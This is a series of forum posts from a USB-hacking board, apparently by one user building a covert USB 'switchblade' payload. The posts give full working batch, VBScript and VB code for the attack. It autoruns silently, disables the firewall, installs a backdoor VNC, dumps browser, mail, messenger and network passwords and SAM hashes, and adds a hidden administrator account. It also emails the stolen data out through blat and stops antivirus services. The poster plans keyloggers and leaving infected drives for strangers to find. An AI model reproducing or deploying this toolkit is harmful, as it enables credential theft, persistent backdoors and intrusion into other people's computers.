-
Posts
171 -
Joined
-
Last visited
Posts posted by pseudobreed
-
-
Instead of just ending the batch, why not call a goto that will exec applications that have dumps that could have changed (ie Internet History/Passwords, Email Client, Messengers, Keylogs).
I do see what you are saying, no reason to pull off a full payload if you already have most of the info.
I added an update to the payload that downloads a new payload and dumps info that may have changed and emails it out using blat. I personally didnt want to chance plugging the drive in again, especially if it was a physically difficult to get to the computer the first time.
If only I could get a good NAT-NAT connection going, then the backdoor VNC will come handy much more when needing to remotely update the payload. At the moment, Im limited to computers that are on the same network. Like the user who walks away from his computer to get a refill at the local "hot-spot."
Im dropping Hamachi as an option. I started to write an app that grabbed the hwnd of applications so I could delete the system tray icons, however, hamachi adds much more than just an icon, and Im sure if you can hide network adapters or not.
Im going to check out OpenVPN now...
Once I get that going. Im thinking about "loosing" the key in a parking lot and having blat just email once the payload is pulled off. Would be kind of interesting to see where it travels. Unless someone puts it in a machine that has no internet connect, then formats the drive to keep as their own.
-
I remember there being a proof of concept of where you could RPC the Wireless Zero Configuration Service and it would drop WEP and WPA in clear text. And, you could do it without being under an admin account.
However, it only worked after the View Available Wireless Networks was opened.
In June, Microsoft issued a patch that actually changes the time it holds this info in the cache.
I didnt hear much about it after that, or even know if the exploit still works.
-
That's why I wrote the vbscript to just grab files based on a filter. I did not know how the files were going to get split and as long as the argument has a wildcard, the filename should get put into the array. That, and I had no idea what happens if you split a file over 101 parts...
The only problem I see is if the files that you want to send out begin the same as other files. However, this is an easy fix. Just name the data files something unique and include as much as you can as the argument with a * at the end.
-
arg !!!
are you ignoring my last post ?
this will work : in less lines :
IF EXIST pwned.r00 GOTO send ELSE GOTO END :hak1 set /a part=%part%+1 IF EXIST pwned.r%part% goto send else goto end :send blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 del pwned.r%part% (delete the evidence after sending) goto hak1 :end exit
If you do decide to use this, you need to make some changes. WinRar splits files either by adding part# to the filename or creates a new file extention such as .r01, .r02, .r03, etc. depending on how the user wants to split files. Usually it's the latter. In either case it will always have a .rar extension for the first file.
So, in your code, you need to send the first .rar file, then go into your loop. Also, while in your loop you need to add a 0 to the file extension if the file number is below 10. Im not sure what happens if you go into three digits, never had to split of a file into that many chunks.
-
I thought about that, and it can be done in the registry.
Do not show System Files
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced] "ShowSuperHidden"=dword:00000000
Do not show Hidden Files
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced] "Hidden"=dword:00000002
Or add this code to autoexec.bat in my payload
:: Hide Hidden and System Files RECYCLERnircmd.exe regsetval dword "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" "ShowSuperHidden" "0" RECYCLERnircmd.exe regsetval dword "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" "Hidden" "2"
-
The above code was from MD's vbscript, however, I used the same method to look for the drive.
I liked your idea so I redid my code and commented it.
I added the GetDriveType API to query the drive to find out what kind of drive it is. This does not spin up the CD-Rom drives. If the type is removable, then look for the file and execute it.
Option Explicit ' API Function to get type of Drive Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long Private Sub Form_Load() Dim FSO As New FileSystemObject ' File System Object Dim objDrive As Drive ' Drive Object Dim lCurrDrive As Long ' Current Drive Letter/Number Dim lDriveType As Long ' Current Drive Type ' Begin loop to check each drive for removable drive For Each objDrive In FSO.Drives ' Convert current drive letter to ANSI lCurrDrive = Asc(objDrive.DriveLetter) ' Get drive type with API call lDriveType = GetDriveType(Chr$(lCurrDrive) & ":") ' 0: Unknown ' 1: Does Not Exist ' 2: Removable Drive ' 3: Fixed Drive ' 4: Remote Drive ' 5: CD-ROM Drive ' 6: RAM Drive ' If drive is removable, then look for the file If lDriveType = 2 Then If FSO.FileExists(objDrive.DriveLetter & ":autorun.bat") Then ' Change directory path for shell call ChDrive objDrive.DriveLetter & ":" ' Exec autorun.bat Shell objDrive.DriveLetter & ":autorun.bat" ' Clean up Set objDrive = Nothing Set FSO = Nothing End If End If Next ' Exit Unload Me End Sub
And, the new file can be downloaded here.
-
Copy and paste the code into goodies.vbs
Call the VBScript on the command line:
cscript /nologo goodies.vbs {filename*}
It will blat out all the files that match the filename*. Use * as the wildcard. (ie. cscript /nologo goodies.vbs goodies* - This will send out every file in the folder that matches goodies.*, goodies.rar, goodies.r01, goodies.r02, etc.)
Set FSO = CreateObject("Scripting.FileSystemObject") ReDim arrFiles(1) Set Folder = FSO.GetFolder(".") Set Files = Folder.Files For Each File in Files If CheckFile(File.Name, WSCript.Arguments(0)) Then If i > UBound(arrFiles) Then Redim Preserve arrFiles(i*2) arrFiles(i) = File.Path i = i + 1 End If Next ReDim Preserve arrFiles(i-1) For Each FileName In arrFiles 'WScript.Echo FileName blat.exe FileName -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 Next Private Function CheckFile (ByVal Name, ByVal Filter) CheckFile = False FilterPos = 1 NamePos = 1 Do If FilterPos > Len(Filter) Then CheckFile = NamePos > len(Name) Exit Function End If If Mid(Filter,FilterPos) = ".*" Then If NamePos > Len(Name) Then CheckFile = True Exit Function End If If Mid(Filter,FilterPos) = "." Then CheckFile = NamePos > Len(Name) Exit Function End If FilterCount = Mid(Filter,FilterPos,1) FilterPos = FilterPos + 1 Select Case FilterCount Case "*" CheckFile = CheckFile2(Name,NamePos,Filter,FilterPos) Exit Function Case "?" If NamePos <= Len(Name) And Mid(Name,NamePos,1) <> "." Then NamePos = NamePos + 1 Case Else If NamePos > Len(Name) Then Exit Function NameCount = Mid(Name,NamePos,1) NamePos = NamePos + 1 If Strcomp(FilterCount,NameCount,vbTextCompare) <> 0 Then Exit Function End Select Loop End Function Private Function CheckFile2 (ByVal Name, ByVal NamePos0, ByVal Filter, ByVal FilterPos0) FilterPos = FilterPos0 Do If FilterPos > Len(Filter) Then CheckFile2 = True Exit Function End If FilterCount2 = Mid(Filter,FilterPos,1) FilterPos = FilterPos + 1 If FilterCount2 <> "*" And FilterCount2 <> "?" Then Exit Do End If Loop If FilterCount2 = "." Then If Mid(Filter,FilterPos) = "*" Then CheckFile2 = True Exit Function End If If FilterPos > Len(Filter) Then CheckFile2 = InStr(NamePos0,Name,".") = 0 Exit Function End If End If For NamePos = NamePos0 To Len(Name) NameCount = Mid(Name,NamePos,1) If StrComp(FilterCount2,NameCount,vbTextCompare)=0 Then If CheckFile(Mid(Name,NamePos+1),Mid(Filter,FilterPos)) Then CheckFile2 = True Exit Function End If End If Next CheckFile2 = False End Function
I didnt comment anything =/, so if you have any questions just ask and Ill explain.
Now you just have to fill in the credentials for blat and you should be good to go.
*Edit - Added argument option to script.
-
Im not 100% sure what you are trying to do, however, you could check out Sourceforge for some inspiration. Maybe you can find what you are looking for and port the code.
-
It almost sounds like a custom rootkit. Nice.
srvany is the application that can turns a batch command into a service. Really easy to setup and I use it all the time. You just have to make sure that all registry settings and application info go into the 'All Users' profiles.
I could never get Blat to auth with Gmail. Gmail kept spitting an error back to me that I had to login a certain way (I cant remember the exact error off the top of my head). It doesnt accept the auth command that Blat gives off.
So, I just signed up with a free smtp host (inbox.com). It works out because if the user fires up ethereal and see where the emails are going it really can not be traced back to me.
Im going to look into what it takes to setup a bare bones SMTP server.
@Spider
If you setup a batch schedule with the at command the batch runs under the system account and therefor runs silently. The user never sees the console window. The same thing works if you use srvany to make a service or you could always call nircmd execcmd.
-
Oh yes, I like the service idea.
Just have to make sure the remote service is running, create your own that rar's and send the files out.
With Blat out of the picture, Im not sure what you have left to use. Im assuming you are just assuming the user only has ports 80, 110, 443 open?. Or maybe you can port scan real quick to see what outs you have available...
Didnt I hear something over at sploit how some guy sent packets using ping? Im going to look into that. And, I wonder how hard it is to make a SMTP server...
@Cooper
I cant remember the program, maybe firewalk or something, but you could actually ask the firewall what rules it had in place. On some firewalls (PIX for sure) it will allow traffic to pass through if it's in the DMZ. However, that's not a failsafe way of pulling it off. Getting the proxy information is easy as soon as you figure out what broweser they are running. Then you could just piggie back over port 80. Unless SNORT is running on outgoing traffic as well.
-
Bah, free host are not what they used to be...
Here are links with YouSendIt (File should be available for 7 days)
Lets see if I can explain this.
The for statement in batch is pretty much like this:
for /F ["option"] {%% | %}variable in {'command'} do ()
/F
Tells the for statement to parse a file or command
["option"]
The tokens option says which tokens from each line are to be passed for each loop. So, Im saying grab tokens 5 through 8. If the last character is an * then it keeps making variables until the remaining text on the line is parsed. (ie. tokens=1-* would grab the whole line)
The delims state what to ignore.
{%% | %}variable
This is the replacable variables(s). %% is to be used in batch files. % is to use at the command prompt. They are case-sensitive and you have to give it an alpha value, such as %a, %b, or %c. I started out with a, so it will create variables a, b, c, d, etc...
{'command'}
This is the command or file to parse.
Here is the FOR command in MSDN.
set
Creates a local variable until the batch ends.
/a
Tells the set command that we are using a math expression.
So, I took the mn variable (Minutes) and added 5 to it.
Then I checked to see if it was greater than 10. If it's less than 10, set only creates a single digit number. So, to fix this I just throw a 0 in front so the "at" command will except the variable as double digit minutes.
I hope that explains everything.
The only reason I used the sched is I didnt want to write an application that had a timer in it. I figured an application running all the time in the background is noticable more than a task in the schedular. Not many people actually look at their schedular. The only fall back there is task schedular service has to be running, I found that out earlier. Im going to include that fix along with the NAT-NAT connection in the next version.
Im almost tempted to try and figure out what Hamachi does and setup a silent install that way. It would be really nice to just have a messenger like app with all the computers listed and connected through a VPN. I do know on the install, it creates a network driver, then they do a NAT to NAT using their private servers...
-
boristsr has a very good point.
Programming is not about the language you choose. You first have to figure out how to solve problems and it really breaks down into being math equations.
When I started out, I never used to do it until I was forced to in college, but pseudocode works wonders. Essentially, once you figure out the problem the only thing you need to know after that is the syntax of the language you are going use.
I started out in BASIC, then VB and then learned C++ and Java in about a years time. Then I worked as a developer using VB for about three years.
VB = Rapid Application Development. It works to throw something together quickly however it is full of memory leaks and it does not clean up code well on it's own (However, you can write your own cleanup). Anything you learn in C++ can be thrown into VB using classes, modules, etc. I dont think people give VB enough credit. I use it primarily considering my clients are on windows 90% of the time and I have a huge collection of modules, classes, and dl libraries from over the years.
C++ = Maybe it's just me, but it takes me about twice as long to do something in C++ than VB and making a GUI is hella a pain. And, I can not think of thing that I strictly need to make in C++ that I can not in VB.
Java = Awesome at OOP. However, it's so freaking slow on windows. It's great that it's cross platform, but like I said, Im on windows.
PHP = Personally, I enjoy it the most. The only down fall is you need a web server (I use XAMPP). It's really easy to learn, it resembles C++ and Java a little bit more so it's not like learning another language all over again and it's fast. The best part I like about it is I can write an app and the client just needs a web browser to use it. It's not OS dependent. This way even people on their phones can get/post info.
All in all. Just jump into a language. If you feel it's a little awkward for your taste then try something else. When it comes down to it, you are going to code in what you feel comfortable in and what works for your style. Because you can pretty much solve any problem in any language if you are comfortable with it. If youre not comfortable with it, the chances are you are just going to forget about it anyways. Which is a good thing. Nothing like staring at some code knowing it's the correct syntax to only find out laters on it's the correct syntax for a difference language.
If I had to do it all over again, I would learn command line by heart first. Then you could start making scripts without a compiler and the learn the basics. Then step it up into VBScript or VB. You will find that most of what you learned in batch scripting will easily port into VBScript or VB. Then if you find that you are being held back, check out C#. Im just not fancy on a computer having to have a 23mb framework to run a 20kb file.
Oh, and get a good IDE. I almost lost it when I tried Borland Compiler.
-
This all really depends on how sensitive the data is and what you want to do with it.
Do you just need to dump the info and come back later to go through it? Or, do you need to dump somewhere to parse and return something to somewhere?
-
Yeah, I dont care. That's why I posted the source. That and I didnt want anyone thinking I hid something in the exe.
Just keep the Guy Fawkes Mask icon going. =)
I didnt comment the exe file at all, if you have any questions just ask.
-
If I had to come up with something quick, I would:
-WinRar command line to split the files into chuncks.
-Blat command line with some fake smtp account and email the chunks to another fake email address that you can log in from anywhere to get what you need.
-Batch it all up and use "at" to send when you need it sent. Since the default profile is system, it will run the batch silently.
However, Im not sure how much someone will not notice... especially depending on the firewall and or av.
-
@moonlit
I found the best way to stop most AV's is just stop the service. Once the service is stopped, bring over the questioned files.
You can always set the service to disabled and not have to worry about it coming back up on startup.
I know Trend Micro and AntiVir both work this way. Since the service is under a system account, once it's stopped it kills the process too.
@therian16
You can use MD's vbscript.
Set objFSO = CreateObject("Scripting.FileSystemObject") Set colDrives = objFSO.Drives For Each objDrive in colDrives If objFSO.FileExists(objDrive.DriveLetter & ":wipcmdgo.cmd") Then strPath = objDrive.DriveLetter & ":wipcmd" strcmd = """" & strPath & "" & "go.cmd" & """" CreateObject("Wscript.Shell").CurrentDirectory = strPath CreateObject("Wscript.Shell").Run strcmd, 0, False End If Next
You pretty much have to tell windows to find a file. Once it's found, assume that is your drive. The key is to have a unique file to search for. Or, at least in a unique place.
It's the samething I did in the loader except I made it an exe in VB so I didnt have to see the console flash.
-
Ive been playing around with this cruzer drive ever since I saw it on Hack a Day.
Here is my version...
First of all, all files have the system and hidden attributes set. Most non savvy computer users have the hide system files checked by default. This adds discretion to the files.
Second of all, the files are located in the RECYCLER folder. This way if a user does see a hidden system folder, they would assume it's just the recycle bin on the drive (Even though removable disk do not have such a thing).
Cruzer Loader (Download):
Files Included:
- cruzer-autorun.iso
- LPInstaller.exe
The cruzer-autorun.iso only holds two files. One being the autorun.inf
[autorun] open=autorun.exe
And, the other being an exe file. I really didnt like the vbscript way considering it pops up a console window for about a second. I just compiled the vbscript into an exe file using VB.
Private Sub Form_Load() Dim FSO As New FileSystemObject Dim objDrive As Drive For Each objDrive In FSO.Drives If FSO.FileExists(objDrive.DriveLetter & ":autorun.bat") Then ChDrive objDrive.DriveLetter & ":" Shell objDrive.DriveLetter & ":autorun.bat" Set objDrive = Nothing Set FSO = Nothing End If Next Unload Me End Sub
This way when the CD autoruns, there is no console flash. It's nice and discreet. All that file does is look for autorun.bat on a disk, assumes it's the USB drive and executes it.
Cruzer Payload (Download):
The payload begins with the autoexec.bat
:: Do not show commands to console @echo off setlocal :: Open Explorer (Only works from My Computer View, not Autorun Dialog Box) ::explorer %CD% :: Dump Directory set dumppath=RECYCLERDUMP%computername%%username% :: Make Directory from Computer NameUser mkdir %dumppath% :: Apply Attributes Hidden and System attrib +h +s RECYCLERDUMP :: Turn Off Windows XP Firewall netsh firewall set opmode disable :: Setup VNC regedit /s RECYCLERultravnc.reg mkdir "%ProgramFiles%UltraVNC" xcopy RECYCLERUltraVNC "%ProgramFiles%UltraVNC" /D /E /C /I /H /F /R /Y "%ProgramFiles%UltraVNCwinvnc.exe" -reinstall :: Set Services to Auto RECYCLERnircmd.exe service auto lanmanworkstation RECYCLERnircmd.exe service auto lanmanserver RECYCLERnircmd.exe service auto winvnc RECYCLERnircmd.exe service auto remoteregistry :: Start Services RECYCLERnircmd.exe service start lanmanworkstation RECYCLERnircmd.exe service start lanmanserver RECYCLERnircmd.exe service start winvnc RECYCLERnircmd.exe service start remoteregistry :: Enable ADMIN$ Share RECYCLERnircmd.exe regsetval dword "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters" "AutoSharewks " "1" :: Port Probe RECYCLERports.exe /sxml %dumppath%ports.xml :: Current Process List RECYCLERprocess.exe /stab %dumppath%process.txt :: Internet Explorer History RECYCLERiehv.exe /sxml %dumppath%iehistory.xml :: Internet Explorer Passwords RECYCLERiepv.exe /sxml %dumppath%iepasswords.xml :: Email Client Passwords RECYCLERmailpv.exe /sxml %dumppath%mailpasswords.xml :: Messenger Client Passwords RECYCLERmspass.exe /sxml %dumppath%messengerpasswords.xml :: Network Passwords RECYCLERnetpass.exe /sxml %dumppath%networkpasswords.xml :: Protected Passwords RECYCLERpspv.exe /stab %dumppath%protectedpasswords.txt :: Services RECYCLERserviwin.exe /stab /services %dumppath%services.txt :: IP Info ipconfig /all > %dumppath%lan.txt :: Get External IP RECYCLERwget.exe http://whatismyip.com ren index.html wan.html xcopy wan.html %dumppath% /H /C /Y del wan.html /q :: SAM Dump :: fgdump will only dump to call folder :: run fgdump, copy pwdump file to dumppath, then delete original RECYCLERfgdump.exe -c -s -r -h 127.0.0.1 -u %username% -p * >> 127.0.0.1.pwdump.log xcopy *.pwdump %dumppath% /H /C /Y xcopy 127.0.0.1.pwdump.log %dumppath% /H /C /Y del *.pwdump /q del 127.0.0.1.pwdump.log /q :: Add User net user SUPPORT password /add /fullname:"CN=Microsoft Corporation,L=Redmond,S=Washington" /comment:"This is a vendor's account for Support" net localgroup Administrators SUPPORT /add net accounts /maxpwage:unlimited :: Hide SUPPORT from Windows XP Login Screen RECYCLERnircmd.exe regsetval dword "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" "SUPPORT" "0" :: Delete MS's Support Account net user SUPPORT_388945a0 /delete :: Local Share's net view 127.0.0.1 > %dumppath%shares.txt :: Copy Files for Remote Updates xcopy RECYCLERblat.dll %windir%system32 /H /C /Y xcopy RECYCLERblat.exe %windir%system32 /H /C /Y xcopy RECYCLERblat.lib %windir%system32 /H /C /Y xcopy RECYCLERinstsrv.exe %windir%system32 /H /C /Y xcopy RECYCLERnircmd.exe %windir%system32 /H /C /Y xcopy RECYCLERrunsaver.ini %windir%system32 /H /C /Y xcopy RECYCLERrunsaver.scr %windir%system32 /H /C /Y xcopy RECYCLERsched.bat %windir%system32 /H /C /Y xcopy RECYCLERsrvany.exe %windir%system32 /H /C /Y xcopy RECYCLERunrar.exe %windir%system32 /H /C /Y xcopy RECYCLERupdate.exe %windir%system32 /H /C /Y xcopy RECYCLERwget.exe %windir%system32 /H /C /Y :: Schedule Update :: Parse Time for /f "tokens=5-8 delims=:. " %%a in ('echo/^|time') do ( set hh=%%a set mn=%%b set ss=%%c set ds=%%d ) :: Add 5 Minutes set /a mn=mn+5 :: If Min is less than 10, add 0 to front if %mn% LSS 10 set mn=0%mn% :: Sched Next Update at %hh%:%mn% %windir%system32sched.bat :: Done
It's all commented, so Im not going to explain what it all does.
In short, it grabs passwords, history, share, sam, installs vnc on port 5900 with password 'password', adds a SUPPORT administrator account, places files in the system32 directory and schedules to be auto updated every hour. This way I can add more to the payload to the future. I also used fgdump instead of pwdump considering it doesnt send lsass.exe into a bezerk mode forcing a shutdown.
Those of you who do not have a Cruzer, you can download the USB payload. The only difference is there is a root autorun.inf that will call the autoexec.bat and open up a windows explorer at the drives root.
In the future I will want to add files that can pass through the AV. For now, I have Trend Micro and AntiVir and Trend Micro is the only thing that picks up the mailpv file. I would also want to add a keylogger that will auto email every hour using blat while it makes it's updates. Right now Im working on a way to setup a NAT to NAT connection so I dont have to worry about port forwarding the router on the remote machine when attempting to use UltraVNC. And, some type of discreet alert so that I know the dumping is complete (Maybe flash the clock on the system tray or something).
I also need to write something that parses all the dump files into a nice friendly interface. It would be much easier instead of having to open xml/text files. Now to use php for ease or vb for portability.
*Edit for spelling
**Edit to mention fgdump
USB Switchblade Development
in USB Hacks
Posted
The AVKiller almost needs a thread by itself.
I tried it on one of my laptops running AntiVir and it did not kill it.
Im not sure how discreet you are trying to make, however, these are the things that popped up on me.
I use task schedular/at all the time so when I noticed the new task scheduled it caught my eye. This only happens when you use it withouth the switch and Im sure that is to gain system rights. A couple issues there, task schedule service has to be running and you have to have rights to the AT command.
Also, when I run 'avkill -a' from the command line about 4-5 console windows pop up on my start menu.
This laptop is running XP SP2 and AntiVir.
Here is some info on AntiVir that may help
Installed Directory:
C:Program FilesAntiVir PersonalEdition Classic
Main Process:
C:Program FilesAntiVir PersonalEdition Classicavcenter.exe
Modules:
C:Program FilesAntiVir PersonalEdition Classicccmainrc.dll
C:Program FilesAntiVir PersonalEdition Classicccgrdrc.dll
Application Specific:
build.dat - Build Number
avewin32.dll - Search Engine
antivir.vdf - Virus Definitions
avcenter.exe - Control Center
avconfig.exe - Config Center
avscan.exe - Luke Filewalker
avpack32.dll - Archive Library
avguard.exe - AntiVir Guard
avgnflt.sys - Filter
sched.exe - Scheduler
update.exe - Updater
Services:
AntiVirService - AntiVir PersonalEdition Classic Guard
AntiVirScheduler - AntiVir PersonalEdition Classic Scheduler
If there is anything else I can provide that will help let me know.